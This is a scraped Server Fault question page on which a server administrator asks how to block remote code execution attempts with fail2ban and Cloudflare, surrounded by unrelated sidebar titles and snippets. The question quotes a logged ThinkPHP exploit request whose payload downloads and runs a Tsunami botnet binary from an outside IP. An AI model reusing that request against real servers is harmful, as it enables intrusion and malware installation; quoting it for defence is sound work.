Block Remote Code Execution Ubuntu Server Fail2Ban & CloudflareProtect dedicated server with...

Correct physics behind the colors on CD (compact disc)?

Can a space-faring robot still function over a billion years?

How to disable or uninstall iTunes under High Sierra without disabling SIP

Deal the cards to the players

Where is the fallacy here?

PTIJ: Mordechai mourning

GDAL GetGeoTransform Documentation -- Is there an oversight, or what am I misunderstanding?

Can the Shape Water Cantrip be used to manipulate blood?

Can a Trickery Domain cleric cast a spell through the Invoke Duplicity clone while inside a Forcecage?

Can we carry rice to Japan?

Should I use HTTPS on a domain that will only be used for redirection?

Is there a frame of reference in which I was born before I was conceived?

Is there a full canon version of Tyrion's jackass/honeycomb joke?

Are there other characters in the Star Wars universe who had damaged bodies and needed to wear an outfit like Darth Vader?

Lock enemy's y-axis when using Vector3.MoveTowards to follow the player

Called into a meeting and told we are being made redundant (laid off) and "not to share outside". Can I tell my partner?

Specific Chinese carabiner QA?

A bug in Excel? Conditional formatting for marking duplicates also highlights unique value

Giving a talk in my old university, how prominently should I tell students my salary?

A peculiar integral identity

How to get the first element while continue streaming?

PTIJ: What dummy is the Gemara referring to?

is 'sed' thread safe

Misplaced tyre lever - alternatives?



Block Remote Code Execution Ubuntu Server Fail2Ban & Cloudflare


Protect dedicated server with cloudflareSlow loading PHP script makes Cloudflare block connectionsCloudflare secondary name server timeoutWhat is the meaning of Server :cloudflare-nginx?Domain forwarding without running a server with CloudFlarephpmyadmin fail2ban failed login log.de domain resolving to wrong server with CloudFlareIPv6 only server through Cloudflare gatewayDDOS attack on cloudflare attached serverPostfix + Cloudflare configuration for FQDN mail server













0















Recently I can see that my Ubuntu (LEMP) server has several remote code execution logs (access.log file). I use Failban, Cloudflare and CSF. I want to know that, are there any possibility to block such attack by using fail2ban? If I managed to block such attacks I can block those IP's from CloudFlare WAF. 



183.82.248.85 - - [06/Mar/2019:19:12:21 +0530] "GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.128.192.144/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Tsunami/2.0"





fail2ban cloudflare ubuntu-18.04







share|improve this question





























    0















    Recently I can see that my Ubuntu (LEMP) server has several remote code execution logs (access.log file). I use Failban, Cloudflare and CSF. I want to know that, are there any possibility to block such attack by using fail2ban? If I managed to block such attacks I can block those IP's from CloudFlare WAF. 



    183.82.248.85 - - [06/Mar/2019:19:12:21 +0530] "GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.128.192.144/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Tsunami/2.0"





    fail2ban cloudflare ubuntu-18.04







    share|improve this question



























      0












      0








      0


      1






      Recently I can see that my Ubuntu (LEMP) server has several remote code execution logs (access.log file). I use Failban, Cloudflare and CSF. I want to know that, are there any possibility to block such attack by using fail2ban? If I managed to block such attacks I can block those IP's from CloudFlare WAF. 



      183.82.248.85 - - [06/Mar/2019:19:12:21 +0530] "GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.128.192.144/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Tsunami/2.0"





      fail2ban cloudflare ubuntu-18.04







      share|improve this question
















      Recently I can see that my Ubuntu (LEMP) server has several remote code execution logs (access.log file). I use Failban, Cloudflare and CSF. I want to know that, are there any possibility to block such attack by using fail2ban? If I managed to block such attacks I can block those IP's from CloudFlare WAF. 



      183.82.248.85 - - [06/Mar/2019:19:12:21 +0530] "GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.128.192.144/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Tsunami/2.0"





      fail2ban cloudflare ubuntu-18.04




      fail2ban cloudflare ubuntu-18.04






      share|improve this question















      share|improve this question













      share|improve this question




      share|improve this question








      edited 9 mins ago







      Chathu

















      asked 11 hours ago









      ChathuChathu

      815




      815






















          0






          active

          oldest

          votes











          Your Answer








          StackExchange.ready(function() {
          var channelOptions = {
          tags: "".split(" "),
          id: "2"
          };
          initTagRenderer("".split(" "), "".split(" "), channelOptions);

          StackExchange.using("externalEditor", function() {
          // Have to fire editor after snippets, if snippets enabled
          if (StackExchange.settings.snippets.snippetsEnabled) {
          StackExchange.using("snippets", function() {
          createEditor();
          });
          }
          else {
          createEditor();
          }
          });

          function createEditor() {
          StackExchange.prepareEditor({
          heartbeatType: 'answer',
          autoActivateHeartbeat: false,
          convertImagesToLinks: true,
          noModals: true,
          showLowRepImageUploadWarning: true,
          reputationToPostImages: 10,
          bindNavPrevention: true,
          postfix: "",
          imageUploader: {
          brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
          contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
          allowUrls: true
          },
          onDemand: true,
          discardSelector: ".discard-answer"
          ,immediatelyShowMarkdownHelp:true
          });


          }
          });














          draft saved

          draft discarded


















          StackExchange.ready(
          function () {
          StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f957075%2fblock-remote-code-execution-ubuntu-server-fail2ban-cloudflare%23new-answer', 'question_page');
          }
          );

          Post as a guest















          Required, but never shown

























          0






          active

          oldest

          votes








          0






          active

          oldest

          votes









          active

          oldest

          votes






          active

          oldest

          votes
















          draft saved

          draft discarded




















































          Thanks for contributing an answer to Server Fault!


          • Please be sure to answer the question. Provide details and share your research!

          But avoid



          • Asking for help, clarification, or responding to other answers.

          • Making statements based on opinion; back them up with references or personal experience.


          To learn more, see our tips on writing great answers.




          draft saved


          draft discarded














          StackExchange.ready(
          function () {
          StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f957075%2fblock-remote-code-execution-ubuntu-server-fail2ban-cloudflare%23new-answer', 'question_page');
          }
          );

          Post as a guest















          Required, but never shown





















































          Required, but never shown














          Required, but never shown












          Required, but never shown







          Required, but never shown

































          Required, but never shown














          Required, but never shown












          Required, but never shown







          Required, but never shown







          -

          Popular posts from this blog

          As a Security Precaution, the user account has been locked The Next CEO of Stack OverflowMS...

          Image
          Could a dragon use its wings to swim? Is it a bad idea to plug the other end of ESD strap to wall ground? How can I prove that a state of equilibrium is unstable? Compilation of a 2d array and a 1d array pgfplots: How to draw a tangent graph below two others? How dangerous is XSS Gauss' Posthumous Publications? How to implement Comparable so it is consistent with identity-equality What does this strange code stamp on my passport mean? "Eavesdropping" vs "Listen in on" Which acid/base does a strong base/acid react when added to a buffer solution?
          Read more

          Список ссавців Італії Природоохоронні статуси | Список |...

          Image
          Списки ссавцівФауна ІталіїСписки:ІталіяСсавці Італії ІталіїМСОПХижіCetartiodactylaРукокриліКомахоїдніЗайцеподібніГризуниМСОП ссавці Італії ? Італія Біорегіон Біогеографічний екорегіон Голарктика Екозона Палеарктика Біом субтропічний ліс, альпійські луки, прісні води, континентальний шельф, континентальний схил Місцевість Континент Європа Країна Італія Територія Середземне море Фауна більшого обсягу За географією фауна Європи За систематикою ссавці, фауна Італії За екологією суходільна фауна, морська фауна За біогеографією теріофауна Європи Геологічний вік сучасність Особливості Видовий обсяг 121 Чужорідні види Genetta genetta, Ondatra zibethicus, Oryctolagus cuniculus, Rattus norvegicus, Rattus rattus, Sciurus carolinensis, Tamias sibiricus Список ссавців Італії містить перелік видів, записаних на території Італії (південна Європа) згідно з
          Read more

          Українські прізвища Зміст Історичні відомості |...

          Image
          АдигськіАбхазькіАзербайджанські [en] Албанські [en] АлтайськіАмериканські [en] Афроамериканські [en] АнглійськіАрабськіБашкирськіБілоруські [en] прізвищаБолгарські [en] БоснійськіБурятськіВельські [en] ВепськіВ'єтнамські [en] Вірменські [en] Гавайські [en] ГолландськіГрецькіГрузинськіДанськіЕстонськіЄврейські [en] Юдейські [en] Ефіопія/Еритрея [en] Зімбабвійські [en] Індіанські [en] ІндійськіІндонезійські [en] Ірландські [en] ІсландськіІспанські і португальськіІталійськіКалмицькі [en] КарельськіКазахськіКамбоджійські [en] Канадські [en] КіргизькіКитайські [en] КоміКорейськіЛатиськіЛитовські [en] Лаоські [en] МарійськіМакедонські [en] Малазійські [en] Монгольські [en] МордовськіНімецькіНорвезькіОсетинськіПерські [en] ПольськіПрибалтійськіПортугальськіРосійськіпрізвищаРумунськіСербськіСкандинавськіСлов'янськіСахаСловацькі [en] Сомалійські [en] ТайванськіТайські [en] Татарські [en] ТибетськіТувинськіТурецькі [en] УгорськіУдмуртськіУкраїнськіпрізвищаФіджійські [en] ФінськіФранцузьк
          Read more